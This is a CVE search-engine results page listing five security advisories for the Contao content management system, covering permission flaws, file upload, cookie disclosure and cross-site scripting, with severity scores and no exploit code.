CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

11 matches found

RedhatCVE•added 2025/05/22 8:41 a.m.•2 views

CVE-2019-19712

Contao 4.0 through 4.8.5 has Insecure Permissions. Back end users can manipulate the details view URL to show pages and articles that have not been enabled for them...

5.3CVSS6.8AI score0.00133EPSS

Exploits0References1

Veracode•added 2024/09/20 7:41 a.m.•8 views

Unrestricted Upload Of File With Dangerous Type

Contao is vulnerable to Unrestricted Upload of File with Dangerous Type. The vulnerability is caused due to a lack of proper validation and security controls in the file upload functionality, allowing malicious users to upload and execute harmful files on the server, which may lead to Remote Code...

8.8CVSS7.6AI score0.00211EPSS

Exploits0References6Affected Software1

Github Security Blog•added 2024/04/09 3:50 p.m.•78 views

Contao: Possible cookie sharing with external domains while checking protected pages for broken links

Impact If the crawler is set to crawl protected pages, it sends the cookie header to externals URLs. Patches Update to Contao 4.13.40 or 5.3.4. Workarounds Disable crawling protected pages. References https://contao.org/en/security-advisories/session-cookie-disclosure-in-the-crawler For more...

8.3CVSS6.9AI score0.00414EPSS

Exploits0References7Affected Software1

Friends Of PHP•added 2022/05/05 6:38 a.m.•16 views

Cross site scripting via canonical URL

More info at https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html...

7.2CVSS7.2AI score0.47055EPSS

Exploits0Affected Software1

Cvelist•added 2021/06/23 9:34 a.m.•12 views

CVE-2021-35210

Contao 4.5.x through 4.9.x before 4.9.16, and 4.10.x through 4.11.x before 4.11.5, allows XSS. It is possible to inject code into the tllog table that will be executed in the browser when the system log is called in the back end...

6.5AI score0.00371EPSS

Exploits0References2